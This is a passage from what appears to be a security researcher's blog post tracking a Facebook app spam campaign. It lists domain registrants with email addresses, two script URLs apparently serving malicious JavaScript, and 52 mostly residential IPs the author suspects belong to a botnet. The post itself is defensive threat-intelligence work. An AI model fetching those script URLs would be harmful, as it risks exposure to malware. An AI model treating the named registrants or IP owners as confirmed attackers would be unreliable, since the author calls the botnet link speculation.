loungeinthesky.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pelletterie2f.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
sinsung.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
spampro.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pegasusstar.info/iuko.php    Louis Pierra / louispierra@yahoo.ca    eNom, Inc. (R126-LRMS)
dancewithrico.info    Greg Wilson / gwilsonmtl88@yahoo.com    eNom, Inc. (R126-LRMS)
grapillse.com    Vasileva Svetlana / VasilevaSvetlana@mail.com    Namecheap.com
limedicg.com    Gilmutdinov Iskander / GilmutdinovIskander@mail.com    Namecheap.com
franebook.com/usa/app3/js.php    Uhb Xjj / zzkmwc4@126.com    XIN NET TECHNOLOGY CORPORATION


So far, the IPs associated with the newly created domains, along with the IPs for franebook.com, all appear to be residential IPs, leading to the likelyhood of it's being associated with a botnet (though that's speculation at present, I'm still checking). The IP details are;


1. 109.110.40.235    -    MICROSOF-917DD8    -    196949    -    196949 109.110.32.0/19 PODRYAD-AS Kozitskiy A.M. PI
2. 109.184.225.161    -    109-184-225-161.dynamic.mts-nn.ru    -    25405    -    25405 109.184.0.0/16 NMTS-AS OJSC VolgaTelecom, Nizhny Novgorod
3. 109.87.243.137    -    Failed resolution    -    13188    -    13188 109.87.128.0/17 BANKINFORM-AS Ukraine
4. 112.202.207.15    -    112.202.207.15.pldt.net    -    9299    -    9299 112.202.192.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
5. 122.173.86.128    -    ABTS-North-Dynamic-128.86.173.122.airtelbroadband.in    -    24560    -    24560 122.173.0.0/17 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
6. 122.174.84.73    -    ABTS-TN-dynamic-073.84.174.122.airtelbroadband.in    -    24560    -    24560 122.174.0.0/16 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
7. 122.3.47.21    -    122.3.47.21.pldt.net    -    9299    -    9299 122.3.32.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
8. 123.24.185.18    -    Failed resolution    -    45899    -    45899 123.24.128.0/18 VNPT-AS-VN VNPT Corp
9. 124.104.133.3    -    124.104.133.3.pldt.net    -    9299    -    9299 124.104.128.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
10. 174.6.12.212    -    S01060015b7c35258.vc.shawcable.net    -    6327    -    6327 174.0.0.0/13 SHAW - Shaw Communications Inc.
11. 178.239.117.60    -    Failed resolution    -    41989    -    41989 178.239.112.0/20 KTBAC-AS ET BAC Dobrinka Bacanova
12. 178.74.246.81    -    cpe-178-74-246-81.enet.vn.ua    -    49223    -    49223 178.74.192.0/18 EVEREST-AS _Everest_ Broadcasting Company Ltd
13. 186.18.175.203    -    cpe-186-18-175-203.telecentro-reversos.com.ar    -    27747    -    27747 186.18.172.0/22 Telecentro S.A.
14. 201.213.212.250    -    201-213-212-250.net.prima.net.ar    -    10481    -    10481 201.213.192.0/19 Prima S.A.
15. 201.254.31.122    -    201-254-31-122.speedy.com.ar    -    22927    -    22927 201.254.0.0/16 Telefonica de Argentina
16. 24.121.132.155    -    Failed resolution    -    25994    -    25994 24.121.132.0/24 NPG-001 - NPG Cable, INC
17. 24.21.222.13    -    c-24-21-222-13.hsd1.or.comcast.net    -    7922    -    33490 24.20.0.0/15 COMCAST-33490 - Comcast Cable Communications, Inc.
18. 24.34.229.143    -    c-24-34-229-143.hsd1.ma.comcast.net    -    7015    -    7015 24.34.128.0/17 COMCAST-7015 - Comcast Cable Communications Holdings, Inc
19. 46.8.157.233    -    HOME-FF4CEE39F0    -    51501    -    51501 46.8.128.0/17 KHD-AS Khabarovsk home networks Ltd
20. 61.7.189.248    -    Failed resolution    -    18252    -    18252 61.7.128.0/18 CAT-AS-AP The Communication Authoity of Thailand, CAT
21. 61.81.70.69    -    Failed resolution    -    4766    -    4766 61.80.0.0/14 KIXS-AS-KR Korea Telecom
22. 64.188.224.203    -    host-64-188-224-203.windjammercable.net    -    1246    -    1246 64.188.224.0/22 WINDJAMMER - Windjammer Communications LLC
23. 67.187.251.116    -    c-67-187-251-116.hsd1.ca.comcast.net    -    33651    -    33651 67.187.240.0/20 CMCS - Comcast Cable Communications, Inc.
24. 67.191.123.51    -    c-67-191-123-51.hsd1.fl.comcast.net    -    20214    -    20214 67.191.112.0/20 COMCAST-20214 - Comcast Cable Communications Holdings, Inc
25. 67.48.25.133    -    mta-67-48-25-133.new.res.rr.com    -    11955    -    11955 67.48.16.0/20 SCRR-11955 - Road Runner HoldCo LLC
26. 69.28.212.93    -    Failed resolution    -    13768    -    13768 69.28.212.0/22 PEER1 - Peer 1 Network Inc.
27. 71.164.175.141    -    pool-71-164-175-141.dllstx.fios.verizon.net    -    19262    -    19262 71.164.128.0/17 VZGNI-TRANSIT - Verizon Online LLC
28. 76.105.44.171    -    c-76-105-44-171.hsd1.ca.comcast.net    -    33651    -    33651 76.105.0.0/18 CMCS - Comcast Cable Communications, Inc.
29. 76.113.188.136    -    c-76-113-188-136.hsd1.mn.comcast.net    -    13367    -    13367 76.113.128.0/17 COMCAST-13367 - Comcast Cable Communications Holdings, Inc
30. 76.123.172.58    -    c-76-123-172-58.hsd1.ms.comcast.net    -    22258    -    22258 76.123.128.0/18 COMCAST-22258 - Comcast Cable Communications Holdings, Inc
31. 77.106.199.225    -    Failed resolution    -    42110    -    42110 77.106.192.0/20 STK-AS Closed Joint Stock Company Sochitelecom
32. 77.121.124.29    -    29.124.121.77.pool.smart.vn.ua    -    38962    -    38962 77.121.96.0/19 UA-SMART-AS Broadcasting company _Smart_ Ltd
33. 77.77.245.211    -    cable-77-77-245-211.dynamic.telemach.ba    -    42560    -    42560 77.77.192.0/18 BA-TELEMACH-AS Telemach BiH
34. 77.87.80.54    -    nat-77-87-80-54.gw4.omsk.multinex.ru    -    41771    -    41771 77.87.80.0/21 MKC-OMSK-AS MultiCable Networks LLC
35. 78.106.176.47    -    78-106-176-47.broadband.corbina.ru    -    8402    -    8402 78.106.176.0/21 CORBINA-AS Corbina Telecom
36. 78.36.249.208    -    78-36-249-208.dynamic.pskov.dslavangard.ru    -    8997    -    8997 78.36.0.0/15 ASN-SPBNIT OJSC North-West Telecom Autonomous System
37. 81.56.83.158    -    lan31-1-81-56-83-158.fbx.proxad.net    -    12322    -    12322 81.56.0.0/15 PROXAD Free SAS
38. 82.240.161.55    -    lam06-3-82-240-161-55.fbx.proxad.net    -    12322    -    12322 82.224.0.0/11 PROXAD Free SAS
39. 85.65.29.199    -    85.65.29.199.dynamic.barak-online.net    -    1680    -    1680 85.64.0.0/15 NV-ASN 013 NetVision Ltd.
40. 86.61.43.146    -    BSN-61-43-146.dial-up.dsl.siol.net    -    5603    -    5603 86.61.0.0/17 SIOL-NET Telekom Slovenije d.d.
41. 87.255.93.95    -    Failed resolution)    -    15836    -    15836 87.255.64.0/19 AXAUTSYS ARAX I.S.P.
42. 90.24.153.22    -    AMontsouris-551-1-18-22.w90-24.abo.wanadoo.fr)    -    3215    -    3215 90.24.128.0/17 AS3215 France Telecom - Orange
43. 91.200.74.206    -    MICROSOF-CDCC83)    -    43815    -    43815 91.200.72.0/22 MMV-AS MMV
44. 91.218.17.207    -    pool-91-218-17-207.optima-east.net)    -    48882    -    48882 91.218.16.0/22 OPTIMA-SHID-AS Optima-Shid LLC
45. 92.114.244.200    -    host-static-92-114-244-200.moldtelecom.md)    -    8926    -    8926 92.114.128.0/17 MOLDTELECOM-AS Moldtelecom Autonomous System
46. 93.124.41.254    -    host-93-124-41-254.dsl.sura.ru)    -    24612    -    24612 93.124.0.0/17 PENZA-SVIAZINFORM-AS JSC Volgatelecom, Penza branch
47. 93.170.43.94    -    93.170.43.94.airexpress.net.ua)    -    51930    -    51930 93.170.40.0/21 AIREXPRESS-AS Buzova-Budinvest Ltd.
48. 94.41.159.5    -    94.41.159.5.dynamic.ufanet.ru)    -    24955    -    24955 94.41.144.0/20 UBN-AS OJSC _Ufanet_
49. 95.69.141.135    -    customer-95-69-141-135.airbites.kh.ua)    -    42335    -    42335 95.69.128.0/18 SPHERE-UA Sphere Ltd.
50. 96.245.13.28    -    pool-96-245-13-28.phlapa.fios.verizon.net)    -    19262    -    19262 96.245.0.0/16 VZGNI-TRANSIT - Verizon Online LLC
51. 98.142.221.7    -    urlproxy.registrar-servers.com)    -    46562    -    46562 98.142.220.0/23 COLO-AT-55-LLC - Colo at 55, LLC
52. 98.196.164.102    -    c-98-196-164-102.hsd1.tx.comcast.net)    -    7922    -    33662 98.196.0.0/14 CMCS - Comcast Cable Communications, Inc.


/update 11:16

dot.tk have now suspended weithajs2.tk.

References:

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

No comments: